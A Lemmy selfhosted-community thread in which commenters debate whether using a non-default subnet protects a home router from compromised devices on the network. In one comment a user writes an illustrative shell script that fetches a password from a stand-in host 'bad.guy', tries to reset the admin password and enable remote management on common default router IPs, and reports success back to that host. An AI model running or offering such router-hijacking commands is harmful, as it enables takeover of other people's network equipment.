Selfhosted

58641 readers

510 users here now

A place to share alternatives to popular online services that can be self-hosted without giving up privacy or locking you into a service you don't control.

Rules:

Be civil: we're here to support and learn from one another. Insults won't be tolerated. Flame wars are frowned upon.
No spam posting.
Posts have to be centered around self-hosting. There are other communities for discussing hardware or home computing. If it's not obvious why your post topic revolves around selfhosting, please include details to make it clear.
Don't duplicate the full text of your blog or github here. Just post the link for folks to click.
Submission headline should match the article title (don’t cherry-pick information from the title to fit your agenda).
No trolling.
No low-effort posts. This is subjective and will largely be determined by the community member reports.

Resources:

selfh.st Newsletter and index of selfhosted software and apps
awesome-selfhosted software
awesome-sysadmin resources
Self-Hosted Podcast from Jupiter Broadcasting

Any issues on the community? Report it using the report flag.

Questions? DM the mods!

founded 2 years ago

MODERATORS

ruud@lemmy.world

Loki@lemmy.world

CannaVet@lemmy.world

HybridSarcasm@lemmy.world

devve@lemmy.world

HybridSarcasm@lemmy.hybridsarcasm.xyz

292

My 15-year old panasonic toughbook is hanging in there as a proxmox server (lemmy.world)

submitted 1 week ago by early_riser@lemmy.world to c/selfhosted@lemmy.world

64 comments fedilink hide all child comments

A huge upshot to using a laptop is you have a built-in UPS and KVM.

you are viewing a single comment's thread
view the rest of the comments

[–] cravl@slrpnk.net 0 points 5 days ago (1 children)

Using a random non-default subnet increases security (slightly, and only through obscurity) by making it harder for a compromised device to perform automated attacks against, most often, your router. Typically they're pretty simple scripts that just try to hit default ports on default IPs.

[–] possiblylinux127@lemmy.zip 1 points 5 days ago* (last edited 5 days ago) (1 children)

That's not how networking works

If someone is on the inside of your network you have much bigger issues. Having a random subnet won't do anything as they can just look at the arp/ndp tables.

[–] cravl@slrpnk.net 0 points 4 days ago* (last edited 4 days ago) (1 children)

That's what I said though, it only protects you from the very most basic of mindless scripts. Obviously ARP/NDP makes it pointless for anything more complicated than…

newpass="$(curl "https://bad.guy/get_pass_for_pub_ip")"
for a in '192.168.1.1' '192.168.0.1' '10.0.0.1'; do
    curl -q "http://${a}/reset_password.cgi?&password=password&new_password=${newpass}" 2>/dev/null && \
    curl -q "http://${a}/remote_management.cgi?&password=${newpass}&wan_enable=1" && \
    curl -q "https://bad.guy/success?addr=%24%7Ba%7D"
done

…completely pointless. If it's a someone inside your network, you need more.

[–] possiblylinux127@lemmy.zip 1 points 4 days ago (1 children)

Yeah I don't really understand your argument

[–] cravl@slrpnk.net 1 points 4 days ago

No worries. It is technically another layer in the "swiss cheese" model, but it certainly is more holes than cheese. I think it falls into the "can't hurt, might help" category.